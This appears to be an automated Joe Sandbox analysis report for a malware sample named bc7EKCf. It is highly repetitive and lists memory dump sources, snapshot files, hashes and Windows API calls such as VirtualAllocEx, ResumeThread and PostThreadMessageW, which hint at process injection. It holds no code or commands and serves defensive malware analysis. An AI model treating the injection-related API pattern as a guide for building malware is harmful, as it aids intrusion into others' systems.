                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b36e1ccbb8a3bcee02d12b9c705da9b41779916debf413e20a5a3f1316396c1a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2dfbc89d4c078510c3805538e40d739c6f0118dafe5dfc32b37f54c97c13b600
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b36e1ccbb8a3bcee02d12b9c705da9b41779916debf413e20a5a3f1316396c1a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7221E2B5D002089FDB10CFAAD984ADEBFF9FB48320F14841AE918A3350C374A940CFA4
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,00000000,05FAD49E,?,?,?,00000E20,?,?,0A8614A8,040E40F8,03100FF8), ref: 0A861539
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: EnumThreadWindows
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2941952884-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47250d07d91216ef2a7ed8505f5fc3d298d6d5132c4d674837ed114988dfefd3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c3ede89e0f326786ebc6a40ed540c72a7f7ef08ce39c42cfc0c88f28c5d37880
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47250d07d91216ef2a7ed8505f5fc3d298d6d5132c4d674837ed114988dfefd3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B2147B19042098FDB10DF9AC848BEEFBF5FB88320F10842AD419A7251D778A945CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,00000000,05FAD49E,?,?,?,00000E20,?,?,0A8614A8,040E40F8,03100FF8), ref: 0A861539
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1823785918.000000000A860000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A860000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a860000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: EnumThreadWindows
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2941952884-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 36f4d9f0af350b454bf16531f85c49da90cbb36c907a0cc9ddc57242d7defdd9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: df1dc9dcae853a2ffc8b6f34446bb6735d4146f2b79c6450beb78b142c0913bc
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36f4d9f0af350b454bf16531f85c49da90cbb36c907a0cc9ddc57242d7defdd9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E2149B1D002098FDB10CFAAC948BEEFBF5BB88310F14842AD455A3351D778A945CF65
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777A2A6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f575699291537cd63ee389416a64062fc4a8d9d4342fd7d872a6c24bcdceee1a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 62cdf212b744074e1e28528c01be8d34562b3d0d8b5843f799d1c9206f60d738
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f575699291537cd63ee389416a64062fc4a8d9d4342fd7d872a6c24bcdceee1a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D61159B19002498FDB10DFA9C444BEEBFF5EF89324F24882AE459A7250C7359944CFA0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cc4f46107932afc53802725908289bdb1e8c0955860f05972e667132f7abb9b1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e0d8d697f0ba2c76bba06da50a7c1fe763a4ea388dacd46c954751d4a4a10cb2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc4f46107932afc53802725908289bdb1e8c0955860f05972e667132f7abb9b1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4114CB1D002598FDB20DFAAC4457DEFFF4EB89324F208429D559A7250CA75A544CF94
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777A2A6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5d4cfcd72c362c3a2e87f501601be7c1f98e50f7033040e4e6ae323fa0b0b5b5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e528c6bd13ebaa933bf992c41c8531cd2187158a53c8feb9996824955e5b7d6
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4cfcd72c362c3a2e87f501601be7c1f98e50f7033040e4e6ae323fa0b0b5b5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D21137B19002499FDB10DFAAC844BDEBFF5EF88320F208829E559A7250C775A944CFA4
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 07C361C8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 454fdeb2fb3a02c28183f11a38ca2b313b92c28d5762a211223da1e7a7b8f03b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 26cd7d5bd3dd84fc34aa2938925c9dcd0832318f5f727071afe7721b1177bb94
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 454fdeb2fb3a02c28183f11a38ca2b313b92c28d5762a211223da1e7a7b8f03b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 311114B08043499FCB21CF99C849BDEFFF4EB09324F14845AD554AB251C375A544CBA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7770000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bce49e487a7dbed7eb46fe0b47131ec00382922aa0adf0f604533537ac138c43
                                                                                                                                                                                                                                                                                                                    • Instruction ID: cff4037d585131bdb5675171995ce5c7deab8c47f3a5a4dddab5683c4999a8c3
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce49e487a7dbed7eb46fe0b47131ec00382922aa0adf0f604533537ac138c43
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D01155B19002488FDB20DFAAC4447DEFBF4AB88324F20882AC419A7250CA74A944CBA4
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 07C36905
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 50058823bea8425ab19a34b6437246f8187924d313e86d4bfa88b7e985e8f7cc
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80aa2f2a50601a671a0ad49f1f6420b0e86901e7a7667547d760a2523cf68a3f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50058823bea8425ab19a34b6437246f8187924d313e86d4bfa88b7e985e8f7cc
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE1136B1800349DFDB10CF9AC845BDEFBF8EB48320F10845AE554A3250C378A584CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7A5FE
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 938cb3a4d3fc7ee84bf7c2e6e8c2b2204bf451ea5c5304894154dc01bd6a7c4e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f8ee9c3ed204fc4179964fc95f3db34b202de7023f0edbd0e160178c56e83a33
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938cb3a4d3fc7ee84bf7c2e6e8c2b2204bf451ea5c5304894154dc01bd6a7c4e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 371110B5C002498FCB10CF9AD944ADEFBF4AB88324F11846AD518A7310D379A545CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 07C361C8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0fd96fcb3532f6b77d78fffc1379bacda1df17043d6f5b433c106741b9951f6f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ddb9f5883519a931d6ff7624fc4c02ae58ce9deee2830e0c9afd0e271bbf4c9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fd96fcb3532f6b77d78fffc1379bacda1df17043d6f5b433c106741b9951f6f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC1102B58103499FDB20DF9AC889BDEBFF4EB08314F20885AE555B7250C375A544CFA4
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 07C361C8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dce71d1c8cd4e79aa15272919d6c80a051d68648a158acc630ee6c52cb87609a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 52812c9b39f399bee7b688293dcfca7673fdff51ca6bc3d0f19a8cf315003076
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dce71d1c8cd4e79aa15272919d6c80a051d68648a158acc630ee6c52cb87609a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E0162B18193958FDB119F6CD4683DDBFF0AB06318F14849AC198AB262C2789588CBD5
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 941113def28792045e39b9f5eb3d5125b96d6d0373e5005b8c810cdaad95b80d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0ed8a7447c6f029cee23dd23ed2500af2f69d18e00689552cf7b19141fcb836c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 941113def28792045e39b9f5eb3d5125b96d6d0373e5005b8c810cdaad95b80d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB3192755493C09FC7038B24D890A51BFB1EB47224F1A85EBD8858F2A7D33A985AC762
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a91ae220f4728abafc705ece1f7183eff90d50542bd5e7b8e822ad02b4e32535
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4dc0f49f46e666b12b51e24bf5f6c34782c2103358ac53b03edd52ebcbd86ab4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a91ae220f4728abafc705ece1f7183eff90d50542bd5e7b8e822ad02b4e32535
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8921F271A04200DFDB15EF68D984B26BFA5EBC8354F24C56DD90A4B396C33AD447CAA1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 831a5fa8ce8f0cb14713d5904fb5fca435b81f2b0a159d998fce148cfbbd4271
                                                                                                                                                                                                                                                                                                                    • Instruction ID: caa4138a8b893ff879f758c07c8b7aa0f57efe0017c804b4598f60052748594f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 831a5fa8ce8f0cb14713d5904fb5fca435b81f2b0a159d998fce148cfbbd4271
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E21F375A04284DFDB01DF18D9C4B2ABBA5FB84324F24C66DE8494F346C77BD446CAA2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 24c550cb70c50bff7629f2e94957ac7fdcec0ed3406827aca2285da8b50f2b98
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 172342503ad7d7c67de77cd420bee79e82b94190478a5f1b4b75199c38fa0c68
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24c550cb70c50bff7629f2e94957ac7fdcec0ed3406827aca2285da8b50f2b98
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921F071A04244DFDB41DF18DEC4B2ABBA5FB94714F20C66DE9494F351C33AD846C6A2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7956e559164daa86ba97d47ac96b3917cf6138f1b60b769301101a3a533ec3df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f323c35dccbe2a6dcf69edfe527594afb44951b8cb11a3cb62461ddbb7643fe4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7956e559164daa86ba97d47ac96b3917cf6138f1b60b769301101a3a533ec3df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 802192755083809FCB03DF64D994711BF71EB86214F28C5EAD8498F2A7C33A980ACB62
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 84096d35c39c5d80098896c6b90b0eba20571a06566271d489bc0c4237060c46
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0d997b284ae0f1f0c104d0bee66077832697e51b59fe20652a5b5183a4af281d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84096d35c39c5d80098896c6b90b0eba20571a06566271d489bc0c4237060c46
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5219075544380DFDB02CF14D984B55BFB1FB85224F25C6AAD8494F293C33A985ACBA2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755992558.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_16dd000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5dc1bdd8fa64dfb9b6b6e5c7f754ddb1eece9fbe1dd13f5f98e7f922cff76906
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD11E375904284CFD752CF18DAC4B2AFF61FB94214F24C6AAD8494F742C33AD40ACB92
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755583790.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_127d000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5b19a9a5631b689dd66610c3cc4113ea9385ee29596a36332c85accded1d1db2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3bb68ce85a2ae69abd9d77eb307baec23a07b461db14b31faaf7ee35236e368b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b19a9a5631b689dd66610c3cc4113ea9385ee29596a36332c85accded1d1db2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1012B310183899AE7158BADCD84767FFD8EF45324F18C92AEE080E286C379D840C671
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1755583790.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_127d000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 03f0bf5e4159e7df977d8e3f855706066ab30e0b514f156f73f1bceb588a2936
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ee2b6e108a0c6489e8cd612e674b96cbac9992f016ec01d34e2222688949b854
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03f0bf5e4159e7df977d8e3f855706066ab30e0b514f156f73f1bceb588a2936
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F0C2710043849EE7158A1ACC84B63FFE8EF41724F18C45AEE480E286C3799840CAB0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817227467.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7c30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: Xbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-63242295
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bfdc58a7da20e297c9969209438b13ec4b9905b8392faa0ae6c9fe1cce4bbb58
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea1acbe92f826a57961adc427bfe331306055f4a2e6d5bf29a963747c8595b13
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfdc58a7da20e297c9969209438b13ec4b9905b8392faa0ae6c9fe1cce4bbb58
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB1FBB0B14697CBDB3C1E36888427A7BE2BFC5B41F684D5DD883DA284CE70CA459B51
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1756246856.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f70000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a9afd6ab4c61e2a93d7f4ae8fde1d8c5985e9d3036328b4ee90451d66f02f633
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8dd8a89335ccb7a197ce0277cffc90eb458d522676a71cee7018ccddf1794889
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9afd6ab4c61e2a93d7f4ae8fde1d8c5985e9d3036328b4ee90451d66f02f633
